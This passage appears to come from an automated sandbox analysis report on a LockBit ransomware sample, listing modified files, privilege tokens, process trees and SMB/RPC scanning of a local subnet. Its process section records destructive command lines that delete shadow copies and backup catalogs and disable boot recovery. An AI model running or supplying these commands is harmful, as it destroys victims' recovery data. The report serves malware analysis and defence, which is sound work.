| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\css\main-selector.css | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.HEIFImageExtension_1.0.22742.0_x64__8wekyb3d8bbwe\Assets\AppList.targetsize-36_altform-unplated.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\HxMailAppList.scale-100.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Assets\contrast-black\iheart-radio.scale-200_contrast-black.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\contrast-black\WideLogo.scale-100_contrast-black.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\mshta.exe |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 | C:\Windows\System32\vds.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName | C:\Windows\System32\vds.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 | C:\Windows\System32\vds.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName | C:\Windows\System32\vds.exe | N/A |
Interacts with shadow copies
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\vssadmin.exe | N/A |
Modifies Control Panel
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2480455240-981575606-1030659066-1000\Control Panel\Desktop\WallpaperStyle = "2" | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2480455240-981575606-1030659066-1000\Control Panel\Desktop\TileWallpaper = "0" | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2480455240-981575606-1030659066-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\wbengine.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\wbengine.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\wbengine.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Uses Volume Shadow Copy service COM API
Processes
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
C:\Windows\system32\vssadmin.exe
vssadmin delete shadows /all /quiet
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Windows\System32\Wbem\WMIC.exe
wmic shadowcopy delete
C:\Windows\system32\bcdedit.exe
bcdedit /set {default} bootstatuspolicy ignoreallfailures
C:\Windows\system32\bcdedit.exe
bcdedit /set {default} recoveryenabled no
C:\Windows\system32\wbadmin.exe
wbadmin delete catalog -quiet
C:\Windows\system32\wbengine.exe
"C:\Windows\system32\wbengine.exe"
C:\Windows\System32\vdsldr.exe
C:\Windows\System32\vdsldr.exe -Embedding
C:\Windows\System32\vds.exe
C:\Windows\System32\vds.exe
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\LockBit-note.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 "C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe" & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe"
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.7 -n 3
C:\Windows\SysWOW64\fsutil.exe
fsutil file setZeroData offset=0 length=524288 "C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 2776 -ip 2776
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2776 -s 1676
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 13.107.21.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 4.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.21.107.13.in-addr.arpa | udp |
| N/A | 10.127.0.243:445 | tcp | |
| N/A | 10.127.0.205:445 | tcp | |
| N/A | 10.127.0.1:445 | tcp | |
| N/A | 10.127.0.203:445 | tcp | |
| N/A | 10.127.0.220:445 | tcp | |
| N/A | 10.127.0.225:445 | tcp | |
| N/A | 10.127.0.207:445 | tcp | |
| N/A | 10.127.0.190:445 | tcp | |
| N/A | 10.127.0.240:445 | tcp | |
| N/A | 10.127.0.239:445 | tcp | |
| N/A | 10.127.0.229:445 | tcp | |
| N/A | 10.127.0.214:445 | tcp | |
| N/A | 10.127.0.193:445 | tcp | |
| N/A | 10.127.0.232:445 | tcp | |
| N/A | 10.127.0.226:445 | tcp | |
| N/A | 10.127.0.187:445 | tcp | |
| N/A | 10.127.0.199:445 | tcp | |
| N/A | 10.127.0.189:445 | tcp | |
| N/A | 10.127.0.218:445 | tcp | |
| N/A | 10.127.0.55:445 | tcp | |
| N/A | 10.127.0.244:445 | tcp | |
| N/A | 10.127.0.202:445 | tcp | |
| N/A | 10.127.0.228:445 | tcp | |
| N/A | 10.127.0.251:445 | tcp | |
| N/A | 10.127.0.235:445 | tcp | |
| N/A | 10.127.0.238:445 | tcp | |
| N/A | 10.127.0.223:445 | tcp | |
| N/A | 10.127.0.236:445 | tcp | |
| N/A | 10.127.0.208:445 | tcp | |
| N/A | 10.127.0.246:445 | tcp | |
| N/A | 10.127.0.196:445 | tcp | |
| N/A | 10.127.0.138:445 | tcp | |
| N/A | 10.127.0.253:445 | tcp | |
| N/A | 10.127.0.217:445 | tcp | |
| N/A | 10.127.0.195:445 | tcp | |
| N/A | 10.127.0.230:445 | tcp | |
| N/A | 10.127.0.221:445 | tcp | |
| N/A | 10.127.0.211:445 | tcp | |
| N/A | 10.127.0.222:445 | tcp | |
| N/A | 10.127.0.242:445 | tcp | |
| N/A | 10.127.0.233:445 | tcp | |
| N/A | 10.127.0.248:445 | tcp | |
| N/A | 10.127.0.198:445 | tcp | |
| N/A | 10.127.0.197:445 | tcp | |
| N/A | 10.127.0.213:445 | tcp | |
| N/A | 10.127.0.192:445 | tcp | |
| N/A | 10.127.0.188:445 | tcp | |
| N/A | 10.127.0.216:445 | tcp | |
| N/A | 10.127.0.234:445 | tcp | |
| N/A | 10.127.0.201:445 | tcp | |
| N/A | 10.127.0.194:445 | tcp | |
| N/A | 10.127.0.212:445 | tcp | |
| N/A | 10.127.0.227:445 | tcp | |
| N/A | 10.127.0.245:445 | tcp | |
| N/A | 10.127.0.241:445 | tcp | |
| N/A | 10.127.0.206:445 | tcp | |
| N/A | 10.127.0.204:445 | tcp | |
| N/A | 10.127.0.200:445 | tcp | |
| N/A | 10.127.0.252:445 | tcp | |
| N/A | 10.127.0.250:445 | tcp | |
| N/A | 10.127.0.247:445 | tcp | |
| N/A | 10.127.0.237:445 | tcp | |
| N/A | 10.127.0.191:445 | tcp | |
| N/A | 10.127.0.249:445 | tcp | |
| N/A | 10.127.0.215:445 | tcp | |
| N/A | 10.127.0.210:445 | tcp | |
| N/A | 10.127.0.27:445 | tcp | |
| N/A | 10.127.0.224:445 | tcp | |
| N/A | 10.127.0.209:445 | tcp | |
| N/A | 10.127.0.219:445 | tcp | |
| N/A | 10.127.0.131:445 | tcp | |
| N/A | 10.127.0.179:445 | tcp | |
| N/A | 10.127.0.176:445 | tcp | |
| N/A | 10.127.0.177:445 | tcp | |
| N/A | 10.127.0.170:445 | tcp | |
| N/A | 10.127.0.180:445 | tcp | |
| N/A | 10.127.0.121:445 | tcp | |
| N/A | 10.127.0.184:445 | tcp | |
| N/A | 10.127.0.141:445 | tcp | |
| N/A | 10.127.0.165:445 | tcp | |
| N/A | 10.127.0.146:445 | tcp | |
| N/A | 10.127.0.154:445 | tcp | |
| N/A | 10.127.0.140:445 | tcp | |
| N/A | 10.127.0.168:445 | tcp | |
| N/A | 10.127.0.158:445 | tcp | |
| N/A | 10.127.0.159:445 | tcp | |
| N/A | 10.127.0.156:445 | tcp | |
| N/A | 10.127.0.183:445 | tcp | |
| N/A | 10.127.0.175:445 | tcp | |
| N/A | 10.127.0.133:445 | tcp | |
| N/A | 10.127.0.143:445 | tcp | |
| N/A | 10.127.0.139:445 | tcp | |
| N/A | 10.127.0.144:445 | tcp | |
| N/A | 10.127.0.136:445 | tcp | |
| N/A | 10.127.0.172:445 | tcp | |
| N/A | 10.127.0.120:445 | tcp | |
| N/A | 10.127.0.151:445 | tcp | |
| N/A | 10.127.0.137:445 | tcp | |
| N/A | 10.127.0.118:445 | tcp | |
| N/A | 10.127.0.160:445 | tcp | |
| N/A | 10.127.0.155:445 | tcp | |
| N/A | 10.127.0.119:445 | tcp | |
| N/A | 10.127.0.115:445 | tcp | |
| N/A | 10.127.0.181:445 | tcp | |
| N/A | 10.127.0.134:445 | tcp | |
| N/A | 10.127.0.148:445 | tcp | |
| N/A | 10.127.0.173:445 | tcp | |
| N/A | 10.127.0.114:445 | tcp | |
| N/A | 10.127.0.153:445 | tcp | |
| N/A | 10.127.0.182:445 | tcp | |
| N/A | 10.127.0.145:445 | tcp | |
| N/A | 10.127.0.186:445 | tcp | |
| N/A | 10.127.0.161:445 | tcp | |
| N/A | 10.127.0.178:445 | tcp | |
| N/A | 10.127.0.116:445 | tcp | |
| N/A | 10.127.0.185:445 | tcp | |
| N/A | 10.127.0.149:445 | tcp | |
| N/A | 10.127.0.163:445 | tcp | |
| N/A | 10.127.0.117:445 | tcp | |
| N/A | 10.127.0.171:445 | tcp | |
| N/A | 10.127.0.142:445 | tcp | |
| N/A | 10.127.0.174:445 | tcp | |
| N/A | 10.127.0.164:445 | tcp | |
| N/A | 10.127.0.132:445 | tcp | |
| N/A | 10.127.0.167:445 | tcp | |
| N/A | 10.127.0.147:445 | tcp | |
| N/A | 10.127.0.130:445 | tcp | |
| N/A | 10.127.0.169:445 | tcp | |
| N/A | 10.127.0.162:445 | tcp | |
| N/A | 10.127.0.152:445 | tcp | |
| N/A | 10.127.0.157:445 | tcp | |
| N/A | 10.127.0.150:445 | tcp | |
| N/A | 10.127.0.135:445 | tcp | |
| N/A | 10.127.0.166:445 | tcp | |
| N/A | 10.127.0.83:445 | tcp | |
| N/A | 10.127.0.101:445 | tcp | |
| N/A | 10.127.0.79:445 | tcp | |
| N/A | 10.127.0.68:445 | tcp | |
| N/A | 10.127.0.63:445 | tcp | |
| N/A | 10.127.0.92:445 | tcp | |
| N/A | 10.127.0.60:445 | tcp | |
| N/A | 10.127.0.129:445 | tcp | |
| N/A | 10.127.0.112:445 | tcp | |
| N/A | 10.127.0.90:445 | tcp | |
| N/A | 10.127.0.62:445 | tcp | |
| N/A | 10.127.0.94:445 | tcp | |
| N/A | 10.127.0.93:445 | tcp | |
| N/A | 10.127.0.61:445 | tcp | |
| N/A | 10.127.0.97:445 | tcp | |
| N/A | 10.127.0.111:445 | tcp | |
| N/A | 10.127.0.124:445 | tcp | |
| N/A | 10.127.0.91:445 | tcp | |
| N/A | 10.127.0.77:445 | tcp | |
| N/A | 10.127.0.66:445 | tcp | |
| N/A | 10.127.0.80:445 | tcp | |
| N/A | 10.127.0.102:445 | tcp | |
| N/A | 10.127.0.64:445 | tcp | |
| N/A | 10.127.0.57:445 | tcp | |
| N/A | 10.127.0.107:445 | tcp | |
| N/A | 10.127.0.104:445 | tcp | |
| N/A | 10.127.0.72:445 | tcp | |
| N/A | 10.127.0.126:445 | tcp | |
| N/A | 10.127.0.105:445 | tcp | |
| N/A | 10.127.0.71:445 | tcp | |
| N/A | 10.127.0.109:445 | tcp | |
| N/A | 10.127.0.82:445 | tcp | |
| N/A | 10.127.0.69:445 | tcp | |
| N/A | 10.127.0.95:445 | tcp | |
| N/A | 10.127.0.74:445 | tcp | |
| N/A | 10.127.0.70:445 | tcp | |
| N/A | 10.127.0.122:445 | tcp | |
| N/A | 10.127.0.73:445 | tcp | |
| N/A | 10.127.0.110:445 | tcp | |
| N/A | 10.127.0.76:445 | tcp | |
| N/A | 10.127.0.65:445 | tcp | |
| N/A | 10.127.0.125:445 | tcp | |
| N/A | 10.127.0.58:445 | tcp | |
| N/A | 10.127.0.106:445 | tcp | |
| N/A | 10.127.0.59:445 | tcp | |
| N/A | 10.127.0.99:445 | tcp | |
| N/A | 10.127.0.103:445 | tcp | |
| N/A | 10.127.0.89:445 | tcp | |
| N/A | 10.127.0.85:445 | tcp | |
| N/A | 10.127.0.128:445 | tcp | |
| N/A | 10.127.0.88:445 | tcp | |
| N/A | 10.127.0.113:445 | tcp | |
| N/A | 10.127.0.127:445 | tcp | |
| N/A | 10.127.0.108:445 | tcp | |
| N/A | 10.127.0.84:445 | tcp | |
| N/A | 10.127.0.67:445 | tcp | |
| N/A | 10.127.0.87:445 | tcp | |
| N/A | 10.127.0.86:445 | tcp | |
| N/A | 10.127.0.78:445 | tcp | |
| N/A | 10.127.0.98:445 | tcp | |
| N/A | 10.127.0.75:445 | tcp | |
| N/A | 10.127.0.81:445 | tcp | |
| N/A | 10.127.0.123:445 | tcp | |
| N/A | 10.127.0.100:445 | tcp | |
| N/A | 10.127.0.96:445 | tcp | |
| N/A | 10.127.0.11:445 | tcp | |
| N/A | 10.127.0.30:445 | tcp | |
| N/A | 10.127.0.10:445 | tcp | |
| N/A | 10.127.0.2:445 | tcp | |
| N/A | 10.127.0.48:445 | tcp | |
| N/A | 10.127.0.6:445 | tcp | |
| N/A | 10.127.0.24:445 | tcp | |
| N/A | 10.127.0.12:445 | tcp | |
| N/A | 10.127.0.47:445 | tcp | |
| N/A | 10.127.0.29:445 | tcp | |
| N/A | 10.127.0.26:445 | tcp | |
| N/A | 10.127.0.20:445 | tcp | |
| N/A | 10.127.0.8:445 | tcp | |
| N/A | 10.127.0.5:445 | tcp | |
| N/A | 10.127.0.56:445 | tcp | |
| N/A | 10.127.0.7:445 | tcp | |
| N/A | 10.127.0.39:445 | tcp | |
| N/A | 10.127.0.21:445 | tcp | |
| N/A | 10.127.0.33:445 | tcp | |
| N/A | 10.127.0.9:445 | tcp | |
| N/A | 10.127.0.19:445 | tcp | |
| N/A | 10.127.0.17:445 | tcp | |
| N/A | 10.127.0.18:445 | tcp | |
| N/A | 10.127.0.14:445 | tcp | |
| N/A | 10.127.0.22:445 | tcp | |
| N/A | 10.127.0.13:445 | tcp | |
| N/A | 10.127.0.49:445 | tcp | |
| N/A | 10.127.0.41:445 | tcp | |
| N/A | 10.127.0.54:445 | tcp | |
| N/A | 10.127.0.0:445 | tcp | |
| N/A | 10.127.0.32:445 | tcp | |
| N/A | 10.127.0.36:445 | tcp | |
| N/A | 10.127.0.45:445 | tcp | |
| N/A | 10.127.0.23:445 | tcp | |
| N/A | 10.127.0.254:445 | tcp | |
| N/A | 10.127.0.42:445 | tcp | |
| N/A | 10.127.0.34:445 | tcp | |
| N/A | 10.127.0.53:445 | tcp | |
| N/A | 10.127.0.52:445 | tcp | |
| N/A | 10.127.0.15:445 | tcp | |
| N/A | 10.127.0.37:445 | tcp | |
| N/A | 10.127.0.46:445 | tcp | |
| N/A | 10.127.0.28:445 | tcp | |
| N/A | 10.127.0.16:445 | tcp | |
| N/A | 10.127.0.3:445 | tcp | |
| N/A | 10.127.0.44:445 | tcp | |
| N/A | 10.127.0.31:445 | tcp | |
| N/A | 10.127.0.50:445 | tcp | |
| N/A | 10.127.0.40:445 | tcp | |
| N/A | 10.127.0.25:445 | tcp | |
| N/A | 10.127.0.35:445 | tcp | |
| N/A | 10.127.0.38:445 | tcp | |
| N/A | 10.127.0.43:445 | tcp | |
| N/A | 10.127.0.4:445 | tcp | |
| N/A | 10.127.0.51:445 | tcp | |
| N/A | 10.127.0.9:135 | tcp | |
| N/A | 10.127.0.10:135 | tcp | |
| N/A | 10.127.0.11:135 | tcp | |
| N/A | 10.127.0.12:135 | tcp | |
| N/A | 10.127.0.13:135 | tcp | |
| N/A | 10.127.0.14:135 | tcp | |
| N/A | 10.127.0.15:135 | tcp | |
| N/A | 10.127.0.16:135 | tcp | |
| N/A | 10.127.0.17:135 | tcp | |
| N/A | 10.127.0.19:135 | tcp | |
| N/A | 10.127.0.18:135 | tcp | |
| N/A | 10.127.0.20:135 | tcp | |
| N/A | 10.127.0.21:135 | tcp | |
| N/A | 10.127.0.22:135 | tcp | |
| N/A | 10.127.0.23:135 | tcp | |
| N/A | 10.127.0.24:135 | tcp | |
| N/A | 10.127.0.25:135 | tcp | |
| N/A | 10.127.0.26:135 | tcp | |
| N/A | 10.127.0.27:135 | tcp | |
| N/A | 10.127.0.28:135 | tcp | |
| N/A | 10.127.0.29:135 | tcp | |
| N/A | 10.127.0.30:135 | tcp | |
| N/A | 10.127.0.31:135 | tcp | |
| N/A | 10.127.0.32:135 | tcp | |
| N/A | 10.127.0.33:135 | tcp | |
| N/A | 10.127.0.34:135 | tcp | |
| N/A | 10.127.0.35:135 | tcp | |
| N/A | 10.127.0.36:135 | tcp | |
| N/A | 10.127.0.37:135 | tcp | |
| N/A | 10.127.0.38:135 | tcp | |
| N/A | 10.127.0.39:135 | tcp | |
| N/A | 10.127.0.40:135 | tcp | |
| N/A | 10.127.0.41:135 | tcp | |
| N/A | 10.127.0.42:135 | tcp | |
| N/A | 10.127.0.43:135 | tcp | |
| N/A | 10.127.0.44:135 | tcp | |
| N/A | 10.127.0.45:135 | tcp | |
| N/A | 10.127.0.46:135 | tcp | |
| N/A | 10.127.0.47:135 | tcp | |
| N/A | 10.127.0.48:135 | tcp | |
| N/A | 10.127.0.49:135 | tcp | |
| N/A | 10.127.0.50:135 | tcp | |
| N/A | 10.127.0.51:135 | tcp | |
| N/A | 10.127.0.52:135 | tcp | |
| N/A | 10.127.0.53:135 | tcp | |
| N/A | 10.127.0.54:135 | tcp | |
| N/A | 10.127.0.55:135 | tcp | |
| N/A | 10.127.0.56:135 | tcp | |
| N/A | 10.127.0.57:135 | tcp | |
| N/A | 10.127.0.58:135 | tcp | |
| N/A | 10.127.0.59:135 | tcp | |
| N/A | 10.127.0.60:135 | tcp | |
| N/A | 10.127.0.61:135 | tcp | |
| N/A | 10.127.0.62:135 | tcp | |
| N/A | 10.127.0.63:135 | tcp | |
| N/A | 10.127.0.64:135 | tcp | |
| N/A | 10.127.0.65:135 | tcp | |
| N/A | 10.127.0.66:135 | tcp | |
| N/A | 10.127.0.67:135 | tcp | |
| N/A | 10.127.0.68:135 | tcp | |
| N/A | 10.127.0.69:135 | tcp | |
| N/A | 10.127.0.70:135 | tcp | |
| N/A | 10.127.0.71:135 | tcp | |
| N/A | 10.127.0.72:135 | tcp | |
| N/A | 10.127.0.73:135 | tcp | |
| N/A | 10.127.0.74:135 | tcp | |
| N/A | 10.127.0.75:135 | tcp | |
| N/A | 10.127.0.76:135 | tcp | |
| N/A | 10.127.0.77:135 | tcp | |
| N/A | 10.127.0.78:135 | tcp | |
| N/A | 10.127.0.79:135 | tcp | |
| N/A | 10.127.0.80:135 | tcp | |
| N/A | 10.127.0.81:135 | tcp | |
| N/A | 10.127.0.82:135 | tcp | |
| N/A | 10.127.0.83:135 | tcp | |
| N/A | 10.127.0.84:135 | tcp | |
| N/A | 10.127.0.85:135 | tcp | |
| N/A | 10.127.0.86:135 | tcp | |
| N/A | 10.127.0.87:135 | tcp | |
| N/A | 10.127.0.88:135 | tcp | |
| N/A | 10.127.0.89:135 | tcp | |
| N/A | 10.127.0.90:135 | tcp | |
| N/A | 10.127.0.91:135 | tcp | |
| N/A | 10.127.0.92:135 | tcp | |
| N/A | 10.127.0.93:135 | tcp | |
| N/A | 10.127.0.94:135 | tcp | |
| N/A | 10.127.0.95:135 | tcp | |
| N/A | 10.127.0.96:135 | tcp | |
| N/A | 10.127.0.97:135 | tcp | |
| N/A | 10.127.0.98:135 | tcp | |
| N/A | 10.127.0.99:135 | tcp | |
| N/A | 10.127.0.100:135 | tcp | |
| N/A | 10.127.0.101:135 | tcp | |
| N/A | 10.127.0.102:135 | tcp | |
| N/A | 10.127.0.103:135 | tcp | |
| N/A | 10.127.0.104:135 | tcp | |
| N/A | 10.127.0.105:135 | tcp | |
| N/A | 10.127.0.122:135 | tcp | |
| N/A | 10.127.0.106:135 | tcp | |
| N/A | 10.127.0.123:135 | tcp | |
| N/A | 10.127.0.107:135 | tcp | |
| N/A | 10.127.0.124:135 | tcp | |
| N/A | 10.127.0.108:135 | tcp | |
| N/A | 10.127.0.125:135 | tcp | |
| N/A | 10.127.0.109:135 | tcp | |
| N/A | 10.127.0.126:135 | tcp | |
| N/A | 10.127.0.127:135 | tcp | |
| N/A | 10.127.0.111:135 | tcp | |
| N/A | 10.127.0.128:135 | tcp | |
| N/A | 10.127.0.112:135 | tcp | |
| N/A | 10.127.0.129:135 | tcp | |
| N/A | 10.127.0.113:135 | tcp | |
| N/A | 10.127.0.110:135 | tcp | |
| N/A | 10.127.0.114:135 | tcp | |
| N/A | 10.127.0.131:135 | tcp | |
| N/A | 10.127.0.130:135 | tcp | |
| N/A | 10.127.0.132:135 | tcp | |
| N/A | 10.127.0.136:135 | tcp | |
| N/A | 10.127.0.116:135 | tcp | |
| N/A | 10.127.0.133:135 | tcp | |
| N/A | 10.127.0.117:135 | tcp | |
| N/A | 10.127.0.134:135 | tcp | |
| N/A | 10.127.0.118:135 | tcp | |
| N/A | 10.127.0.135:135 | tcp | |
| N/A | 10.127.0.119:135 | tcp | |
| N/A | 10.127.0.193:135 | tcp | |
| N/A | 10.127.0.251:135 | tcp | |
| N/A | 10.127.0.250:135 | tcp | |
| N/A | 10.127.0.249:135 | tcp | |
| N/A | 10.127.0.248:135 | tcp | |
| N/A | 10.127.0.247:135 | tcp | |
| N/A | 10.127.0.246:135 | tcp | |
| N/A | 10.127.0.245:135 | tcp | |
| N/A | 10.127.0.244:135 | tcp | |
| N/A | 10.127.0.243:135 | tcp | |
| N/A | 10.127.0.115:135 | tcp | |
| N/A | 10.127.0.241:135 | tcp | |
| N/A | 10.127.0.240:135 | tcp | |
| N/A | 10.127.0.239:135 | tcp | |
| N/A | 10.127.0.238:135 | tcp | |
| N/A | 10.127.0.237:135 | tcp | |
| N/A | 10.127.0.236:135 | tcp | |
| N/A | 10.127.0.235:135 | tcp | |
| N/A | 10.127.0.234:135 | tcp | |
| N/A | 10.127.0.233:135 | tcp | |
| N/A | 10.127.0.232:135 | tcp | |
| N/A | 10.127.0.229:135 | tcp | |
